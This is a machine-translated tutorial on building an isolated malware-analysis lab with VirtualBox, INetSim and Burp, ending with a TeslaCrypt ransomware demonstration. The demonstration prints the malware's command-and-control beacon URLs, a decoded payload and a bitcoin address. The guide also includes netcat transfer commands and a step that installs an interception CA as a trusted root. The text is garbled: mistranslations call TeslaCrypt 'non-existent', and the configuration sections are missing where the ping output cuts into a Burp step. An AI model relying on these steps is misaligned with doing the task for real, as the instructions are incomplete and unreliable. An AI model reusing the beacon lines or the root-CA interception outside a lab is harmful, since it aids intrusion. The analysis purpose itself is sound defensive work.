Shulou(Shulou.com)06/02 Report--

This article mainly introduces how to use VirtualBox,INetSim and Burp to establish their own malware analysis, the article is very detailed, has a certain reference value, interested friends must read it!

An experimental environment for malware analysis will be established using VirtualBox,INetSim and Burp. The environment will be isolated from the host operating system and Internet to form a separate virtual network. We will set up two victim virtual machines (Ubuntu and Windows 7) and an analysis server to simulate common Internet services such as HTTP or DNS so that we can record and analyze network traffic from any Linux or Windows malware. These malware will unknowingly connect to our server instead of Internet. In addition, we will take the infamous TeslaCrypt blackmail software as an example. This is a non-existent blackmail software that infected a large number of systems from 2015 to mid-2016.

1. Create a virtual machine

The following are two links that can be used to download Ubuntu and Windows 7 virtual machine images.

Ubuntu (victim machine 1 and analyzer): download Ubuntu 16.10 64-bit from OsBoxes (direct download link)

Windows 7 (victim machine 2): download from Microsoft Developer Website (select IE 11 on Win 7 (x86) and VirtualBox)

Tip: if you already have an unused Ubuntu virtual machine, just clone it and reuse it in the next steps (right-click > Clone).

Before you begin, make sure you have enough disk space available (my advice is at least 10-20 GB).

Ubuntu basic Settings

OsBoxes provides us with a plug-and-play virtual disk that we can use immediately by simply inserting it. First of all, let's extract the file we just downloaded.

$7za e Ubuntu_16.10_Yakkety-VB-64bit.7z

After unzipping, you will get a virtual disk VDI file. We will start with the basic setup of the Ubuntu image and then clone our two Ubuntu virtual machines.

In VirtualBox, create a new machine (click the New button) and name it Ubuntu analysis (Analyzer). Then, select the RAM size to assign. At this point, VirtualBox will ask you if you want to create a new virtual hard disk or use an existing virtual hard disk. Select "use existing virtual hard disk files", click the directory icon on the right side of the drop-down list, and select our VDI file.

Then we start the virtual machine. The default password is osboxes.org.

Basic settings

The default keyboard uses a QWERTY layout. If you are not used to it, you can change it through Settings > Text Entry.

In addition, you can change the default password using the following command:

$passwd osboxes

Update the package:

$sudo apt-get update$ sudo apt-get upgrade

Install guest additions

Select Devices > Insert guest additions CD image from the menu of the window where VM is running. You will then be asked if you want to run the installer; select yes and enter the default password (osboxes.org by default). After the installation is complete, close VM.

Clone

Now that you have a basic Ubuntu VM, clone it (right-click on the VirtualBox main screen > Clone). Name the cloned Ubuntu Ubuntu victim and select the check box to initialize its MAC address. We choose Full clone as the clone type for a more complete cloning operation.

Windows 7 basic Settings

The download link provided earlier points to the ZIP archive that contains the OVA file. Unlike VDI files, it is not only a virtual disk, but also a complete description of a virtual machine (including its virtual disk), so the only thing we need to do to create a virtual machine from it is to select File > Import Appliance in the main window of VirtualBox. If your memory is large enough, it is recommended that you give it at least 1024 MB of RAM.

After the import is complete (you may have to wait a few minutes here), rename the Windows 7 victim virtual machine and start it.

Install guest additions

Select Devices > Insert guest additions CD image from the menu of the window where VM is running. Then run the installer from the inserted virtual CD. After the installation is complete, close VM.

two。 Setting up the Analyzer: INetSim,BurpINetSim

INetSim is a very convenient and powerful utility that allows you to simulate a bunch of standard Internet services on a single machine. By default, it simulates DNS,HTTP and SMTP that can be easily adjusted. Since we will later configure the victim machine to have no Internet access, we need to use INetSim to simulate.

There are several ways to install INetSim, and the easiest way is to run the following command to install it (in the analyzer).

$sudo su$ echo "deb http://www.inetsim.org/debian/ binary/" > / etc/apt/sources.list.d/inetsim.list$ wget-O-http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add-$apt update$ apt install inetsim

Note: to copy and paste these commands in the analyzer, select device > shared Clipboard > bidirectional settings.

We will discuss how to use INetSim later.

Burp

INetSim is powerful, but its support for SSL is very limited. It comes with a single host (inetsim.org) certificate and does not support dynamic generation of SSL certificates. This will be a problem for us because most malware now uses SSL to encrypt their communications. Therefore, we will use Burp as a transparent SSL proxy, which will be located between the victim's machine and the INetSim to block SSL traffic. Of course, you don't have to use Burp if you don't need to block some SSL traffic right now.

Burp supports the generation of instant SSL certificates for any of our victim machines. It also creates a single CA certificate for us, which we will import in the victim machine later. In this way, we can block encrypted traffic sent by malware.

You can download Burp from the official website. The download is an bash installation script that you run to install Burp:

$bash ~ / Downloads/burpsuite_free_linux_v1_7_23.sh

By default, the Burp executable is ~ / BurpSuiteFree/BurpSuiteFree.

3. Set up an isolated virtual network

We are going to establish an isolated network of three virtual machines. There will be no Internet access to this network. In addition, we want the analyzer to act as a network gateway for the victim machine so that it can easily intercept network traffic and simulate various services, such as DNS or HTTP.

To achieve this goal, we will use the VirtualBox internal network. For those familiar with VirtualBox, the difference between an internal network and a host-only network is that the internal network does not have access to the host at all.

For each of the three virtual machines, do the following:

Open its settings

Go to the "Network" section

Change the attach to field to the Internal network

Enter malware analysis network as the network name

Analysis machine

Start the analyzer, open the terminal and run the ifconfig command. You should have an interface called enp0s3. If the name is different, follow the instructions below.

Open the file / etc/network/interfaces as root and add the following at the end:

Auto enp0s3iface enp0s3 inet static address 10.0.0.1 netmask 255.255.255.0

This will assign static IP 10.0.0.1 to the machine on our virtual network. Now that we have configured the network interface, we use the following command to start it:

$sudo ifup enp0s3

Ubuntu victim machine

The process here is very similar, except that we will assign it a static IP 10.0.0.2 and instruct it to use 10.0.0.1 as the gateway and DNS server. Append the following to the end of the file / etc/network/interfaces:

Auto enp0s3iface enp0s3 inet static address 10.0.0.2 gateway 10.0.0.1 netmask 255.255.255.0 dns-nameservers 10.0.0.1

And run:

$sudo ifup enp0s3 $sudo service networking restart

Now you should be able to ping the analyzer:

$ping 10.0.0.1PING 10.0.0.1 (10.0.0.1) 56 (84) bytes of data.64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms

Windows 7 victim machine

Right-click the network icon in the taskbar (or go to start menu > Control Panel > Network and Internet > Network and sharing Center), click Local connection 2 > Properties, select Internet Protocol version 4, and then click the Properties button.

We assigned static IP 10.0.0.3 to the machine, and the rest of the configuration was similar to the Ubuntu victim machine.

Be sure to verify the settings (click OK, apply, etc., until all settings windows disappear). You should now be able to ping the analytical machine:

> ping 10.0.0.1Pinging 10.0.0.1 with 32 bytes of data:Reply from 10.0.0.1: bytes=32 time Project options > Save project options completes this operation.

Let's make sure that our current settings work properly. Start INetSim and run:

$curl-- insecure https://localhost

You should get the following:

INetSim default HTML page

This is the default HTML page for INetSim HTTP server fake mode.

This file is an HTML document.

Import Burp's CA certificate on our victim's machine

Start the Windows 7 victim machine and try to browse to HTTPS URL (for example, https://github.com), and you will see a warning similar to the following:

This is because the SSL certificate generated by Burp, signed by its own CA certificate, is not trusted by the victim machine.

In Burp, add a new proxy listener on port 8080 to listen for all interfaces (tab proxy > options > button add):

Then, from the victim's machine, browse to http://10.0.0.1:8080.

Click the CA certificate in the upper right corner to download the Burp CA certificate.

On the Windows 7 victim machine: open the file, click install Certificate > next > put all certificates in the following store: trusted Root Certificate Authority > next

On Ubuntu's victim machine:

Convert the certificate to the appropriate format (.crt)

$openssl x509-in ~ / Downloads/cacert.der-inform DER-out burp.crt

And copy to / usr/local/share/ca-certificates

$sudo cp burp.crt / usr/local/share/ca-certificates/

Running

$sudo update-ca-certificates

By default, Firefox does not use the system's certificate store. If you want the SSL connection to work in Firefox, please go to Advanced > Certificate > Import in Firefox Settings. Select burp.crt and check to trust this CA to identify the Web site.

Setup complete!

After importing Burp's CA certificate into the victim's machine, be sure to create a new snapshot (for example, the Clean status of the Burp CA certificate installed).

6. Set up a shared folder between the analyzer and the host system

In some cases you need to transfer some files to the analysis machine or the victim machine; for convenience, we can set up a shared folder.

In the VirtualBox running the analyzer, go to device > shared folder > shared folder Settings. Create a new shared folder, select the local folder of the host operating system you want to map to, and then select a name. Select the check box to make it permanent.

Now we mount the shared folder on the analyzer:

$mkdir ~ / malware-analysis-share$ sudo mount-t vboxsf-o uid=$UID,gid=$ (id-g) malware-analysis-share ~ / malware-analysis-share

Transfer the file to the victim's machine

At some point, you probably need to transfer some files (such as malware samples) to a victim's machine. Setting up file sharing for them is a bad idea because it means that the victim machine (and to some extent, the malware sample you are running) can access it.

The easiest way to transfer files to the Ubuntu victim machine is to use netcat. Here is a simple example.

# Receiving machine having IP 10.0.0.2$ nc-lvp 4444 > file.exe# Analysis machine (sender) $cat file_to_transfer.exe | nc 10.0.0.2 4444

Unfortunately for Window, we don't have a netcat available. One option provided here is to use INetSim to provide files to the victim's machine.

# inetsim.conf# Remove the default line: http_fakefile exe sample_gui.exe x-msdos-program# Replace it byhttp_fakefile exe file_to_transfer.exe x-msdos-program# And put file_to_transfer.exe in. / data/http/fakefiles

With this configuration, simply browse to any URL that ends with ".exe" (for example, http://github.com/file.exe).

7. Demo: TeslaCrypt blackmail software

I downloaded a sample of the blackmail software TeslaCrypt and sent it to the Windows 7 victim machine to execute TeslaCrypt. A few seconds later, all the files in VM are encrypted and the following window pops up.

After checking the INetSim log, we can see that the blackmail software performs the following DNS lookup:

7tno4hib47vlep5o.tor2web.org

7tno4hib47vlep5o.tor2web.blutmagie.de

7tno4hib47vlep5o.tor2web.fi

Bitcoin.toshi.io

Multiple HTTP requests are sent to these domains.

HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA=HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT

You can see that these requests are sent to addresses like tor2web.org,tor2web.blutmagie.de and tor2web.fi, respectively. These services allow access to the Tor network without having to install Tor Browser or similar tools.

The malware contacts the Tor hidden service 7tno4hib47vlep5o.onion, which may be some kind of Cobb C server. The requested payload is a base64-encoded string, which is decoded as follows:

Subject=Ping&key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3&addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT&files=0&size=0&version=0.2.6a&date=1496648675&OS=7601&ID=16&subid=0&gate=G1

It also makes an API call to bitcoin.toshio.io, probably checking to see if the ransom has been paid to the bitcoin address 1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT. The malware appears to generate a unique bitcoin address for each infected computer because there is no record of any money transfers.

The above is all the contents of the article "how to use VirtualBox,INetSim and Burp to build your own malware analysis". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.